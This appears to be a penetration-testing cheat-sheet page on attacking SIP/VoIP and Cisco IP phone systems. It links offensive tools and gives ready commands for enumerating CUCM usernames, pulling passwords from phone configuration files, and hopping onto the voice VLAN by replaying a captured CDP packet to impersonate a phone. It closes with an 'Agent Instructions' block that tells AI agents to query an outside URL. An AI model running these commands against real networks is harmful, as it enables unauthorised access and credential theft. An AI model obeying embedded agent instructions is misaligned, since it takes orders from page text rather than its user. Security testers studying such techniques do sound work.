# SIP / VoIP

* <https://medium.com/vartai-security/practical-voip-penetration-testing-a1791602e1b4>
* <https://www.hackingarticles.in/penetration-testing-on-voip-asterisk-server-part-2/>

## Cisco IP Phones

* <https://www.trustedsec.com/blog/seeyoucm-thief-exploiting-common-misconfigurations-in-cisco-phone-systems/>
* <https://www.n00py.io/2022/01/unauthenticated-dumping-of-usernames-via-cisco-unified-call-manager-cucm/>
* <https://github.com/n00py/CUCMe/blob/main/cucme.sh>
* <https://github.com/trustedsec/SeeYouCM-Thief>
* <https://github.com/llt4l/iCULeak.py>
* <https://github.com/Bond-o/vnum>

Scrap Cisco IP Phone web interfaces by IPs to get the corresponding host names:

```
$ for i in `cat phones_ip.txt`; do curl -s http://$i | grep -oP 'SEP[A-Z0-9]+' | uniq | tee -a phones.txt; done
```

Enumerate usernames on a Cisco CUCM server:

```
$ bash cucme.sh CUCM01.megacorp.local
Or
$ python3 thief.py -H CUCM01.megacorp.local --userenum
Or
$ curl -sk 'https://cucm01.megacorp.local:8443/cucm-uds/users?lastName=' | grep -oP '<firstName>.*?</firstName><lastName>.*?</lastName>' | sort -u | tee cucm_users.txt
```

Enumerate credential leaks on Cisco IP Phones:

```
$ python3 iCULeak.py -nA -c CUCM01.megacorp.local -l phones.txt 192.168.1.11
Or
$ for i in `cat phones.txt`; do curl -s http://cucm01.megacorp.local:6970/$i.cnf.xml | grep -i pass; done
```

### VLAN Hopping on Cisco Voice

* <https://savvyadmin.com/vlan-hopping-on-cisco-voice-enabled-switch-ports/>

Capture the first CDP advertisement while plugged through the phone:

```
$ sudo tcpdump -s 0 -w cdp-packet.cap -c 1 -ni eth0 ether host 01:00:0c:cc:cc:cc
$ sudo tcpdump -vr cdp-packet.cap
```

Relay it once a minute to simulate a legit phone device:

```
$ sudo watch -n 60 "tcpreplay -i eth0 cdp-packet.cap"
```

Configure a sub-interface to access the voice VLAN:

```
$ sudo vconfig add eth0 1337
$ sudo ifconfig eth0.1337 up
$ sudo dhclient -v eth0.1337
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/networks/sip-voip.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.